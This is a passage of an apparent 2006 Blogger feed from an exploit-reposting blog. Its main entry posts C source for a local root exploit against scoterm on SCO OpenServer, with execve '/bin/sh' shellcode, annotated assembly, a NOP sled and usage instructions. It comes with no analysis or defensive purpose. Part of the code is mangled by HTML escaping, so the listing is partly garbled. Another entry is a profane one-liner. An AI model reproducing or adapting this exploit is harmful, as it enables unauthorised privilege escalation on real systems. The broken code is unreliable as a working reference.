href='http://y0ure0wn3d.blogspot.com/2006/08/remote-exploit-for-socks5.html' title='Remote exploit for Socks5'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-115584416247675331</id><published>2006-08-17T12:37:00.000-07:00</published><updated>2006-08-17T12:49:27.726-07:00</updated><title type='text'>Local root exploit for scoterm</title><content type='html'>&lt;pre&gt;/*&lt;br /&gt;* &lt;scotermx.c&gt; Local root exploit&lt;br /&gt;*&lt;br /&gt;* Usage:&lt;br /&gt;* $ cc scotermx.c -o scotermx&lt;br /&gt;* $ scoterm&lt;br /&gt;* $ /usr/bin/X11/scoterm -geometry `scotermx 0`&lt;br /&gt;*    or&lt;br /&gt;* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`&lt;br /&gt;*&lt;br /&gt;* Note: scoterm need to be run from a valid x-display&lt;br /&gt;*&lt;br /&gt;* By: The Dark Raver of t0s (Murcia/Spain - 21/6/99)&lt;br /&gt;*&lt;br /&gt;* &lt;http:&gt; - &lt;darkraver@t0s.org&gt;&lt;br /&gt;*&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;char hell[]=&lt;br /&gt;"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"&lt;br /&gt;"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"&lt;br /&gt;"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;char hell[]=&lt;br /&gt;"\xeb\x1b" // start: jmp uno&lt;br /&gt;"\x5e" // dos: popl %esi&lt;br /&gt;"\x31\xdb" // xorl %ebx,%ebx&lt;br /&gt;"\x89\x5e\x07" // movb %bl,0x7(%esi)&lt;br /&gt;"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)&lt;br /&gt;"\x88\x5e\x11" // movb %bl,0x11(%esi)&lt;br /&gt;"\x31\xc0" // xorl %eax,%eax&lt;br /&gt;"\xb0\x3b" // movb $0x3b,%al&lt;br /&gt;"\x8d\x7e\x07" // leal 0x07(%esi),%edi&lt;br /&gt;"\x89\xf9" // movl %edi,%ecx&lt;br /&gt;"\x53" // pushl %ebx&lt;br /&gt;"\x51" // pushl %ecx&lt;br /&gt;"\x56" // pushl %esi&lt;br /&gt;"\x56" // pushl %esi&lt;br /&gt;"\xeb\x10" // jmp execve&lt;br /&gt;"\xe8\xe0\xff\xff\xff" // uno: call dos&lt;br /&gt;"/bin/sh"&lt;br /&gt;"\xaa\xaa\xaa\xaa"&lt;br /&gt;"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;                   &lt;br /&gt;#define OFF 0x80452ff  // SCO OpenServer 5.0.4&lt;br /&gt;#define ALINEA 1&lt;br /&gt;#define LEN 2000&lt;br /&gt;                   &lt;br /&gt;&lt;br /&gt;int main(int argc, char *argv[]) {&lt;br /&gt;&lt;br /&gt;int offset=0;&lt;br /&gt;char buf[LEN];&lt;br /&gt;int i;&lt;br /&gt;&lt;br /&gt;if(argc &lt;&gt;\n");&lt;br /&gt; exit(0); }&lt;br /&gt;else {&lt;br /&gt; offset=atoi(argv[1]); }&lt;br /&gt;&lt;br /&gt;memset(buf,0x90,LEN);&lt;br /&gt;memcpy(buf+1000,hell,strlen(hell));&lt;br /&gt;for(i=1100+ALINEA;i&lt;len-4;i+=4) int="" i="OFF+offset;" 0=""&gt;&lt;/len-4;i+=4)&gt;&lt;/offset&gt;&lt;/stdio.h&gt;&lt;/stdlib.h&gt;&lt;/darkraver@t0s.org&gt;&lt;/http:&gt;&lt;/scotermx.c&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584416247675331?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/115584416247675331/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=115584416247675331' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584416247675331'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584416247675331'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/08/local-root-exploit-for-scoterm.html' title='Local root exploit for scoterm'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-115584291300058866</id><published>2006-08-17T12:27:00.000-07:00</published><updated>2006-08-17T12:35:56.876-07:00</updated><title type='text'>fuck!!</title><content type='html'>fuck off!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584291300058866?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/115584291300058866/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=115584291300058866' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584291300058866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584291300058866'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/08/fuck.html' title='fuck!!'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry></feed>
